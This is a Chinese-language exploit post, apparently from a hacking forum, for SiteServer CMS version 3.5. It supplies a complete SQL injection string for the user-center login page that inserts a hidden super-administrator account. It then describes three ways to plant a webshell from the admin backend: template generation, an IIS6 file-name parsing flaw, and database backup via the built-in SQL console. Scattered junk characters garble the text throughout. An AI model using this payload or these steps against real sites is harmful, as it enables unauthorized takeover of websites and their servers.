经测试秒杀最新的3.5版) h- u+ j/ Q( V% [% w% l
. F. E" z# ^! V9 D J& F+ q6 u7 i
stieserver官网:www.siteserver.cn' k5 x0 e3 ^5 n* ^* y
?6 ^; i+ h. F$ d0 R
- R/ Q0 F: R0 ?- R
( H7 G1 L3 }1 h
EXP:
. G- E" _) j( @ @* f) i0 ?$ C# n' s5 A
直接访问UserCenter/login.aspx
. N z; V3 G/ @% J, A# ]. ?3 O- @
& j' B$ n, u9 E& o/ O5 w) x, `1 ~- g& L6 q. W. J: ^5 k: s
用户名处输入:
. H7 K1 V: K( R& b; r6 ]) y' B
/ f8 A* M. F4 g2 H$ |% Y123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
& n% R: G b9 M+ a
# I4 Q9 X% C; h$ N0 B* F$ r 9 t. I4 |+ \% W* s
! G; B, k$ x2 T3 A
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
) Y" @9 T0 d1 }- n- ]
: B" {. [; G- y& e0 s& b
1 o! R0 p$ `+ U) k X' a* n
F4 I2 u* x: |+ L# Q之后再访问后台SiteServer/login.aspx用插入的用户登陆9 [8 ?7 B5 V* ^% e6 ^# d$ T# w
3 u' P! U0 h& Q; h
: v) a5 T# F7 h/ y
2 n$ L/ f6 g# C8 i6 Q; X Q
后台拿webshell的三种方法:
' y3 K3 G6 K& U( C- c4 Z
& } }) a; l/ J$ m3 j5 ~) u一、. I8 ]( s! w$ e& W8 h2 _8 ?
0 F3 U$ Q2 Z5 V9 X
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx" I E1 \( c9 h# m3 z
: K; k9 P, g' C% P% u二、: h8 z% ]4 b3 `& X
& V5 b. ~2 j) N6 w6 b成员权限-》添加用户-》用户名为:1.asp
# }0 s4 W# d7 T' g( X% b/ J& ]& g
http://127.0.0.1/usercenter/* r* F( W( b' N* w6 u# w7 Q- |) z
" P" A0 [' ^" m1 M' k S9 a+ a; J$ H
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
, o D+ m/ k6 O. ~, t9 b
4 k' O" `$ w: Q! X+ f2 M% _(ps:后台添加用户时不会验证是否含有非法字符) E A R p* h R
( Y* D' Q5 N. E+ R `2 Z! O三、
5 L6 t; G/ P! p- w2 x+ s" k/ P& r% e
系统工具-》实用工具-》机器参数查看
+ U6 Y& m2 Y8 ~( ]可以看到数据库类型、名称,WEB路径0 M r4 ~ M4 M d
: ]2 L0 g* W0 }0 X5 S
系统工具-》数据库工具-》SQL语句查询
4 ?9 l9 J( i6 j这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
3 v3 G, h, H8 j' @3 v
* y* X- }$ i4 E( n2 ~1 U/ v( a |